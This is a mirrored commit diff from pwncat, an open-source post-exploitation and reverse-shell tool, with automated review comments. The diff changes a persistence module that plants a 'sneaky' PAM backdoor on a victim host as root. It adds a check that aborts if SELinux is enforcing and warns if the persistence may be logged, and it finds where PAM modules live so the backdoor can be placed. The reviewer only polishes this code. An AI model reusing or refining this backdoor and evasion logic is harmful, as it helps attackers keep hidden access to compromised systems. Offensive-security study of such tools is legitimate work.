mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-23 17:15:38 +01:00

Merge branch 'master' into new-logging

Caleb Stewart 2020-07-02 09:49:42 -04:00
commit 40bfd7cb20
3 changed files with 35 additions and 12 deletions


@ -28,6 +28,14 @@ class SELinuxState(FactData):
result += f"{Fore.YELLOW}{self.state}{Fore.RESET}" result += f"{Fore.YELLOW}{self.state}{Fore.RESET}"
return result return result
@property
def mode(self) -> str:
return self.status.get("Current mode", "unknown").lower()
@property
def enabled(self) -> bool:
return self.state.lower() == "enabled"
@property @property
def description(self): def description(self):
width = max(len(x) for x in self.status) + 1 width = max(len(x) for x in self.status) + 1
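Review bot: The new `mode` and `enabled` properties have no docstrings, and the fallback in `mode` is a contract callers need to know about: when `status` has no "Current mode" key it returns "unknown", which any caller testing for an enforcing mode will treat as not enforcing. A docstring such as `"""Lower-cased "Current mode" entry of status, or "unknown" if absent."""` on `mode`, and `"""True when the reported state is "enabled" (case-insensitive)."""` on `enabled`, would make both explicit. `enabled` calls `self.state.lower()` and so assumes `state` is always a string; where `state` is set is outside this hunk, so that should be confirmed against the constructor.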


@ -9,7 +9,7 @@ from typing import Optional
import pwncat import pwncat
from pwncat import util from pwncat import util
from pwncat.persist import PersistenceMethod, PersistenceError from pwncat.persist import PersistenceMethod, PersistenceError
from pwncat.util import Access, CompilationError from pwncat.util import Access, CompilationError, console
class Method(PersistenceMethod): class Method(PersistenceMethod):
@ -37,6 +37,21 @@ class Method(PersistenceMethod):
if pwncat.victim.current_user.id != 0: if pwncat.victim.current_user.id != 0:
raise PersistenceError("must be root") raise PersistenceError("must be root")
try:
# Enumerate SELinux state
selinux = pwncat.victim.enumerate.first("system.selinux").data
# If enabled and enforced, it will block this from working
if selinux.enabled and "enforc" in selinux.mode:
raise PersistenceError("selinux is currently in enforce mode")
elif selinux.enabled:
# If enabled but permissive, it will log this module
console.log(
"[yellow]warning[/yellow]: selinux is enabled; persistence may be logged"
)
except ValueError:
# SELinux not found
pass
# Source to our module # Source to our module
sneaky_source = textwrap.dedent( sneaky_source = textwrap.dedent(
""" """
@ -195,17 +210,17 @@ Z3YpewogICAgIHJldHVybiBQQU1fSUdOT1JFOwp9Cg==
# Locate the pam_deny.so to know where to place the new module # Locate the pam_deny.so to know where to place the new module
pam_modules = "/usr/lib/security" pam_modules = "/usr/lib/security"
try:
results = ( results = (
pwncat.victim.env(["find", "/", "-name", "pam_deny.so"]) pwncat.victim.run(
.strip() "find / -name pam_deny.so 2>/dev/null | grep -v 'snap/'"
.decode("utf-8")
) )
if results != "": .strip()
results = results.split("\n") .decode("utf-8")
pam_modules = os.path.dirname(results[0]) )
except FileNotFoundError: if results != "":
pass results = results.split("\n")
pam_modules = os.path.dirname(results[0])
# Ensure the directory exists and is writable # Ensure the directory exists and is writable
access = pwncat.victim.access(pam_modules) access = pwncat.victim.access(pam_modules)
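Review bot: The `try` in the added SELinux check covers more than the lookup it is meant to guard. `except ValueError: pass` is commented as "SELinux not found", but it also wraps the `selinux.enabled` and `selinux.mode` reads and the `console.log` call, so an unrelated ValueError raised by any of them is silently dropped and the whole check is skipped. Keep only `selinux = pwncat.victim.enumerate.first("system.selinux").data` inside the `try` and move the enabled/mode branches into an `else:` clause. That ValueError is what a missing fact raises is inferred from the comment, since the enumerate API is not visible on this page; the enclosing method also starts and ends outside these hunks.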


@ -30,7 +30,7 @@ dependency_links = [
# Setup # Setup
setup( setup(
name="pwncat", name="pwncat",
version="0.1", version="0.2.0",
description="A fancy reverse and bind shell handler", description="A fancy reverse and bind shell handler",
author="Caleb Stewart", author="Caleb Stewart",
url="https://gitlab.com/calebstewart/pwncat", url="https://gitlab.com/calebstewart/pwncat",